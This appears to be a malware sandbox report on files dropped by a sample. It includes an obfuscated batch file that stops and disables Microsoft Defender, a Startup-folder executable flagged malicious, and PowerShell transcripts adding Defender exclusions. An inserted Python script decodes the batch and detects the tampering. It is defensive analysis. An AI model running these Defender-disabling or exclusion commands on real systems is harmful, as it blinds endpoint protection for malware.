                                                                                      C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat
                                                                                      Process:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8399
                                                                                      Entropy (8bit):4.665734428420432
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                      MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                      SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                      SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                      SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
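The dropped test.bat above is obfuscated by splitting every command into single characters and padding them with %name% references to environment variables that are never defined; inside a batch file cmd.exe expands an undefined %name% to nothing, so the junk disappears at run time and the clean command is what executes. The Python script below, added here as an illustration and not part of the report or of the sample itself, emulates that expansion and recovers the commands. Its input is transcribed from the Preview field above: the '..' pairs are taken as the CRLF terminators recorded in the File Type field, and the fifth line, which the preview cuts off after "sc config ", is left out. The service names it alerts on beyond WinDefend and Sense are the example's own choice.

```python
# Added example (not part of the Joe Sandbox report): decode the dropped
# test.bat, whose commands are split character by character with %name%
# references to environment variables that are never defined.

# Constructed sample input: the first four lines of test.bat, transcribed from
# the Preview field of the report. The preview renders each CRLF as '..'; they
# are restored here. The preview is truncated part-way through the fifth line
# ("sc config ..."), so that line is omitted.
SAMPLE_BAT = (
    "@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%\r\n"
    "%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% "
    "%npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%\r\n"
    "%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% "
    "%vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% "
    "%trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% "
    "%ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%\r\n"
    "%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% "
    "%vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%\r\n"
)


def expand_batch_line(line, env):
    """Emulate cmd.exe percent expansion for one line of a *batch file*.

    Rules implemented (batch-file semantics, not the interactive prompt):
      %NAME%   -> env[NAME] when NAME is defined (names are case-insensitive)
      %NAME%   -> ''       when NAME is undefined  <- what the obfuscation abuses
      %%       -> a literal '%'
      lone '%' -> kept as-is
    Substring/substitution forms such as %VAR:~0,3% are not handled.
    `env` keys must already be upper-case (deobfuscate_batch does that).
    """
    out = []
    i, n = 0, len(line)
    while i < n:
        if line[i] != "%":
            out.append(line[i])
            i += 1
            continue
        j = line.find("%", i + 1)
        if j == -1:                       # no closing percent: literal text
            out.append(line[i:])
            break
        name = line[i + 1:j]
        out.append("%" if name == "" else env.get(name.upper(), ""))
        i = j + 1
    return "".join(out)


def deobfuscate_batch(text, env=None):
    """Return the non-empty command lines of `text` after percent expansion."""
    env = {k.upper(): v for k, v in (env or {}).items()}
    commands = []
    for raw in text.splitlines():
        expanded = expand_batch_line(raw, env).strip()
        if expanded:
            commands.append(expanded)
    return commands


# Service names worth alerting on when a script stops or reconfigures them.
# WinDefend is the Microsoft Defender Antivirus service and Sense the Defender
# for Endpoint sensor; the remaining names are this example's own additions.
TAMPER_SERVICES = {"windefend", "sense", "wdnissvc", "securityhealthservice", "mpssvc"}


def defender_tampering(commands):
    """Return the decoded commands that point sc.exe at a security service."""
    hits = []
    for cmd in commands:
        parts = cmd.lower().split()
        if (len(parts) >= 3 and parts[0] in ("sc", "sc.exe")
                and parts[1] in ("stop", "config", "delete")
                and parts[2] in TAMPER_SERVICES):
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    decoded = deobfuscate_batch(SAMPLE_BAT)
    for command in decoded:
        print(command)
    print("tampering:", defender_tampering(decoded))
```

Run against the transcribed preview, the four lines decode to "@echo off", "sc stop windefend", "sc config windefend start= disabled" and "sc stop Sense", i.e. the script stops Microsoft Defender Antivirus, prevents it from starting again and stops the Defender for Endpoint sensor. Because the padding variable names are random, a detection that keys on the obfuscated text is useless; matching on the expanded command line, or on sc.exe being launched with these service names, is what survives re-obfuscation.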
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1053624
                                                                                      Entropy (8bit):6.324012336357782
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:M1VPzxljWH+fdg8yXresMdJFBwA48ayWMWPX6+Pqpn7PJuhgqCakBu7:yzxljW+g3Xub48ayWlK+ipnLJuhVkA7
                                                                                      MD5:44696D252000850D3EA71D9AE238AEDC
                                                                                      SHA1:1FB61A1DF500F9025641526CB4013D555B129A84
                                                                                      SHA-256:1B39D6BF218028DFE7BC8254A3B1682804E9BF05B8298C708C318236F64AD986
                                                                                      SHA-512:E1115A0A70B6D532633C1C60733A2AEBBDC9E14863DEAEC7F6E15604C20F9F3CE3D36132EC2B814A4C774B25A6C4C8CCAD4003724B98ABEAD2BE3F752B9D6314
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..............0.................. ... ....@.. .......................`............`.....................................J.... ..D....................@......N................................................ ............... ..H............text........ ...................... ..`.rsrc...D.... ......................@..@.reloc.......@......................@..@................4.......H.......D...$.......7...hZ...................................................S..`.@..a...B.?.LG........m.*..mLH`|.....q.......l...'..H..y....h.3..e...-t..m.=.Z.l2..~..Cw.X....3.. .............r$$r.4...h.\.D..N........p..Q.M#z_.t...)....W.i{&~>.i.rZg.g..WX.R.."*.|f....k....A.a............N..).-u.5.8].................!V.......2.<.'.{.f1.b.yD..O`....$(..... ...]>n.&.....o....`..+.N......2...x....N...V....._D/.. .NK..D.F....6..<...#g.....$.6.#%.K..`.1....V.l.3.[,..v
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe:Zone.Identifier
                                                                                      Process:C:\Users\user\Desktop\RYhdmjjr94.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.4_2TT6xL.20210915085355.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5827
                                                                                      Entropy (8bit):5.412577102742799
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZR/UNtNqDo1ZPnZG/UNtNqDo1Z1J8v8B8jZxm/UNtNqDo1ZXw8R8R8EjZX:Zul
                                                                                      MD5:40CBECAB20EB48D8E8BD4A8B9E038195
                                                                                      SHA1:C47009B2981B517667FCE7B4D9CFFEC19805A887
                                                                                      SHA-256:048BCF294C886E073FEE45619FB453419E6725E3C619FF1143BF774B753FB3C8
                                                                                      SHA-512:067F5080D1844EB60E16D1DC01AC4E6C0905A954B13B12F9A41E6A4AEC28A29E7F66491CAED2261AA62D9349729D4245738DFBE22B2ACF85C8DDBE170A5F04AB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085358..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..Process ID: 3688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085358..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085625..Username: computer\user..RunAs User: D
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.5Md4gwAb.20210915085436.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.342423606554998
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZh/UN7nqDo1ZdlPZL/UN7nqDo1ZOqVA0cA0cA0+ZG:K00K
                                                                                      MD5:F1DEB865A2CB688F69D755D2E60D1FB1
                                                                                      SHA1:F77A4E9C57F0A8CE1DBBE63F78A7530A61431DE7
                                                                                      SHA-256:C7CA8EAFBA30436EB87FE12261754B023CA52A63F54AE76D154691AA023A5B68
                                                                                      SHA-512:03250D675F5761087F0D2BC491A01E1165847F52F5B20187D9E9542BFFCF593FC7A2C27F63720782B371D0EB8AAEE9D59BA8ED58046FCA53B132A2A9E6F9842F
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085439..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 3016..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085439..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.65F6kbZc.20210915085351.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5827
                                                                                      Entropy (8bit):5.412654176154929
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZ9/UNtWqDo1ZLnZX/UNtWqDo1ZUJ8v8B8jZE/UNtWqDo1Zqw8R8R8FZ6:4
                                                                                      MD5:699F622695DE9265C458774ED5517E22
                                                                                      SHA1:651C5B219A21C7DB14DF7B6C722E6ECE45435668
                                                                                      SHA-256:893EF02A486B4286153A6613521EF5AC67B41838E1919C5386C6069C34063637
                                                                                      SHA-512:2C8787CC275EB7230A22623EECEE0BE20FE08DFC40E2379530A868FDA6954405429118647ACB667669AD7D525C651815A40B77B6CAE72D4F564EA8C7068CD7DB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085354..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..Process ID: 7148..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085354..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\2FDD6624\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085635..Username: computer\user..RunAs User: D
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.7GV4I+P8.20210915085342.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.409079834213978
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZw/UN07qDo1ZLrZW/UN07qDo1Z14S+SQSjZl/UN07qDo1Z75SASASCZJ:f
                                                                                      MD5:A395452A3C4DE84F92428C18162077E7
                                                                                      SHA1:A8A67EA53D2F1F1287168AC81EF0C583649E4416
                                                                                      SHA-256:174121A08CA779D3F66BB4129D035FC30AC0F5B5B5A7C4094CA3C9925361F515
                                                                                      SHA-512:02E36402F0D9766BCF87EE7D2C5F990205DD8D89263CD0D49455389CE57252D8C615B322ED36271B18FA43CBB0DA55476B99DA63ED2116FABC59A750ADA8F692
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085344..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 6832..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085344..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085557..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.8wRRpIo6.20210915085354.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.40547114401758
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZM/UN0cqDo1Z7rZy/UN0cqDo1ZD4S+SQSjZSZ/UN0cqDo1ZIV5SASASxZF:IXa
                                                                                      MD5:1813264A77217E25811AE401F2185BFE
                                                                                      SHA1:641C7EB694ECFFD9FA59A91E802310E9619A98FB
                                                                                      SHA-256:7D2BEF101006D302949D6718C7A45654A3F6395EAC9BEDBF1697943C29740681
                                                                                      SHA-512:D8F498DD81019706F13EF0CAFEE06A62DA4B773A40E98C41211C1B4C751469E83FF1CFE2B09F0ADFDF6E534E9D5A9A401A2195F6E36586425273A5C93B3C31BF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085357..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 1140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085357..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085614..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.M0A9nFrO.20210915085339.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.343744764805817
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZj/UN7rqDo1ZLLPZl/UN7rqDo1Z+qVA0cA0cA07TZ9q:G00a/q
                                                                                      MD5:02909BE5AF30B0F46FFD9F8F6E6CC25F
                                                                                      SHA1:A59E77F85B70EA86061FBE4E7D108D094704622D
                                                                                      SHA-256:09063EB87A3D6DDD9456C8C93C7E9476671CF8D3BDBB0240ADDD800B5ED4D4E4
                                                                                      SHA-512:7002D9D37E6F09FF9E67889768B0664505152542FEA9F8E0E090D03705FD25A39C298826BCF3060335E208F1BDB549D37AE36A0DA3C364B39D3B1EF7521562A4
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085341..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 6688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085341..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.ZxpJrQlW.20210915085337.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.34238914176191
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZY/UN7BqDo1ZIuPZy/UN7BqDo1ZuqVA0cA0cA0tZe3:00073
                                                                                      MD5:78D3C659E3AC7494B537B37B9C2D9FD5
                                                                                      SHA1:307DA7A6C778F11C1655963B81DA9CF4C859DC17
                                                                                      SHA-256:6AE4A1A1EF55D5206D75AD361929A3212D5854B26AA4964F2EAFE098900E63E9
                                                                                      SHA-512:E0212E41F18448A3E2BEE8323D4C82A114FB362482AF73F901847FAA8000D6B1C51106005713B9F81D4334C7653799FE9C087E5BB6CEDC66AEB3E75EF30FC8AE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085339..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 6512..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085339..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.p8kQh6Fk.20210915085438.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):3800
                                                                                      Entropy (8bit):5.340557632367787
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZQ/UN7rtqDo1Zc3PZ1/UN7rtqDo1ZEqVA0cA0cA0dZm:000J
                                                                                      MD5:E626BF866DBC5D68A6DAF266E3908A40
                                                                                      SHA1:E245BCE7E1F23B835D1247AC2622ECB62443DBAC
                                                                                      SHA-256:9CBC11190B035DCD0227351583ED83AA458E0CD9DD0E2D5C9EC6E14671AB2FCE
                                                                                      SHA-512:E3A4A450AC490C7554E500AC898344ED16D3C47B15665E43DD101B2B8A6FBC09050FE20CC70185D93F52AD94BD5577C6559A4C6CC27CD7D417958668901C4872
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085443..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..Process ID: 5052..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085443..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe -Force..**********************..Command start time: 2021
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.v0+taG7v.20210915085331.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.408658522522741
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZh/UN0kqDo1Z+rZB/UN0kqDo1Z+4S+SQSjZV/UN0kqDo1Z75SASASfZX:T
                                                                                      MD5:1CA0A29BCCAEBC272168654F51689E9C
                                                                                      SHA1:96ABDE5269C473F9B2582338B543D778ED1FF593
                                                                                      SHA-256:DE7F21FBBC1DAC9244E03C73592FBC09215C6C1FD41E706AFCC90787BBCC6E0C
                                                                                      SHA-512:E415AEF9A0F5118DFF2E77DBA079688C2FF9EF16A91422A23D8B27E625D1515639FD5A66908179E06B4444111608E5E9129F096A32EA3F7E26D7EE3E63012250
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085332..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 6260..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085332..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085743..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Users\user\Documents\20210915\PowerShell_transcript.284992.vQHTUbYb.20210915085333.txt
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5795
                                                                                      Entropy (8bit):5.409254768401486
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:BZE/UN0WqDo1ZTrZ4/UN0WqDo1Ze4S+SQSjZ9/UN0WqDo1ZG5SASASebZQ:Z
                                                                                      MD5:ED04B63AA54BBEABC392FE57DE5D1007
                                                                                      SHA1:2F911BE11314D54FFAAD710672AA086A6B0BB331
                                                                                      SHA-256:DE1574984A7578934F21CD7D9CBF22C09E608E6432542F400CEE2E675B387EE5
                                                                                      SHA-512:B1954748CB4197C2672078971B6071D473418C8F0D3E317B767ACA865E73E217AF04BF6D44BCC6129641D315B3AE676585831573C9FE47EA2D9413BA8B2EE52D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
